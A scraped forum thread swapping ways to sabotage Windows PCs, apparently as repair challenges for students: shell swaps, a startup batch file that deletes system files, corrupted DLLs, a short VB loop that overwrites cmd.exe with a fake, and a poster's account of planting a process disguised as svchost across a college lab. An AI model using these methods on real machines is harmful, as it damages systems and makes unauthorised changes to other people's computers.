[windows] sabotage ideas

change the shell from explorer.exe to cmd.exe (then rename explore.exe)
you will be supprised at how many so called "windows Guru's" are back to square one when they are faced with a prompt and no easy way to get their point&click back

wow THAT is some evil shit. lol.

put a piece of masking tape over the optical sensor on the mouse.

Most people will start checking cable connections first, but will probably check the underside of the mouse before keyboarding their way to look at the device manager. I'd say you'll get about 3 reboots worth of giggles before they find it.

wow THAT is some evil shit. lol.

When I was in high school in a computer class are teacher did that shit to us as one of the diag challenges. This was back with windows 98 so you could edit the file via dos but it was still a pain in the ass.

Load up grub and have it display the normal OS's Splashscreen forever.

Change the network driver. Havent tried this, but it might work. Get a network driver for the same vendor but different chipset, edit the INFs so it looks normal, and include the proper VEN and DEV. IIRC, it will say its installed fine, but should not actually function.

Install AOL and Kazaa.

we have a winner, not only will that fuck up a pc, it will somehow magically jump threw the air and start destroying all the other pc's that are next to it.

no comeback from that :D it be deaded just like a pile of anus laptops.

I don't get it, it's just a fake that disables cmd when you replace the origional.
That's the idea, you can't use it because it's a fake console.

The only problem is, the actual console isn't theme aware, so this fake sticks out like a sore thumb.

You could even just have a batch file run at next startup (if the "fixer" doesn't boot up when you have screwed it up, meaning after you set it up, it stays running when he gets on it). Have it delete some system files.

But also create a little problem. For example, something that will require a reboot in order to fix (renaming some system files, cmd.exe trick, or something like that).

That way, they think "all I gotta do is rename this file, reboot, and I'm golden".
But when they reboot, they find out what your REAL trick was. You may even fool a few into thinking they actually made it worse.

The ALT+255 trick worked on Win95 and 98. Used to, you could go in through DOS and rename it with the ALT+255 trick. The file wouldn't actually show up in Windows Explorer that way.

You could hide an entire FOLDER contents if you created it through DOS that way.

Another "simple" trick you an use is to change the icon pictures. Use the Recycle Bin icon for My Computer, use the Networking icon for Internet Explorer, and then use the My Computer icon for a batch program that shuts down the computer.

if you can make a "quick launch" icon using the Start menu button, and then remove the start button, you could get really crazy.

Install AOL and Kazaa.

Ladies and Gentlemen, we have a winner :)

1) Take a high quality screenshot of the desktop and save it to a lossless format, then set it as the background and right click the desktop and remove all desktop icons and remove the taskbar and lock it there.

2) If anyone is using an optical mouse, tear the corner off a postit note and stick it over the censor :)

Not entirely sure if it works, but I heard once about painting a layer of clear nail polish onto an electrical plug (in this case, from the PSU), letting it dry, then plugging it back into the wall. Apparently the polish acts like an insulator and won't let current through - nobody ever checks the plug.

i've updated the fake cmd.exe (cosmetics)

on the computer i ran it on i made the theme classic

also, the windows kernel detects the cmd.exe being changed, so it replaces it back to the normal one.

so back to VB:

i wrote a quick program that will simply replace the tailored cmd.exe (renamed to wuweb.ocx) with the standard cmd.exe at a 500ms interval.
Code:
On Error Resume Next
FileCopy "C:\windows\system32\wuweb.ocx", "C:\windows\system32\cmd.exe"
http://impulse100.net/s.exe

the reason why i made an exe do this is so you can hook it on to another process.

---

now i just to think of something that is only fixable via command prompt... :confused:

---

its a pretty useless sabotage, but when someone who is trying to fix a computer runs in to that, they will be pretty damn persistent to fix it.

I just thought of another thing, maybe to NULL out the TCP controls in the NIC drivers with a hex editor. I'd mess around with that, but i'm not at home :(

Add a space at the end of a folder name, perhaps "Windows" to "Windows " or "Program Files" to "Program Files ".

idiot test:
make a loop that continually opens cmd's in fullscreen. Not hard to get around, but an interesting first test for them :p

Open random dlls in your favorite editor (Resource Editor, etc), and delete occasional characters.

idiot test:
make a loop that continually opens cmd's in fullscreen. Not hard to get around, but an interesting first test for them :p

Open random dlls in your favorite editor (Resource Editor, etc), and delete occasional characters.

most important files are replaced back to the normal ones by the kernel...

The OP might consider thinking ahead by imaging the drive in the computer he's going to be repairing with something like Ghost or TrueImage.

Just pop in the backup and restore the drive back to the way it was before it was messed with, you might even be commended for original thinking :D

I've tried a few of the techniques in this thread so far...some the kids stumbled on quickly and fixed, others made them think quite a bit. Either way, they fixed all of them without reformatting or "ghosting."

Thanks for the ideas guys :)

keep them coming, for others.

Not my plan but if you have the time, here is a suggestion that might work in conjunction with something else. http://hardforum.com/showthread.php?t=1175348

Use that program he has there to shotgun blast the hard drive. While they're trying to fix the problem, it might slow them down a bit.

I wrote a program that ran as svchost and would go to a predefined web address, download a pic that I uploaded, and set it as wallpaper. It would do this every night. I then installed this on all of the windows machines in a lab at college.

For 3 years, like clockwork, this thing would set/reset the wallpaper every night. I would put funny stuff, but nothing that made it necessary for college staff to spend the time investigating. So it stayed on there, putting up some dumb, hilarious stuff.

Sitting there listening to people complain about the moron who was doing this were some of the best times in college. "WHO IS THE RETARD WHO KEEPS SETTING THIS WALLPAPER? DOESNT HE HAVE A LIFE?" LOL.

Actually, I think that was topped only by the note I put on the microwave in a lounge: "Preheat microwave 10 seconds before use." For an entire semester, nearly 100% of faculty, staff, and students preheated the microwave with nothing in it. When the head of the entire university happened to be there preheating it, we nearly died.

He asked a worker: "is this for real?" The worker said he wasn't sure, but it probably was, and just to be on the safe side, it's best to preheat it.

Unfortunately, next semester the note was gone.

Actually, I think that was topped only by the note I put on the microwave in a lounge: "Preheat microwave 10 seconds before use." For an entire semester, nearly 100% of faculty, staff, and students preheated the microwave with nothing in it. When the head of the entire university happened to be there preheating it, we nearly died.

He asked a worker: "is this for real?" The worker said he wasn't sure, but it probably was, and just to be on the safe side, it's best to preheat it.

Unfortunately, next semester the note was gone.

Oh my god, that's hilarious! :D
I HAVE to try that at the college i go to.

Back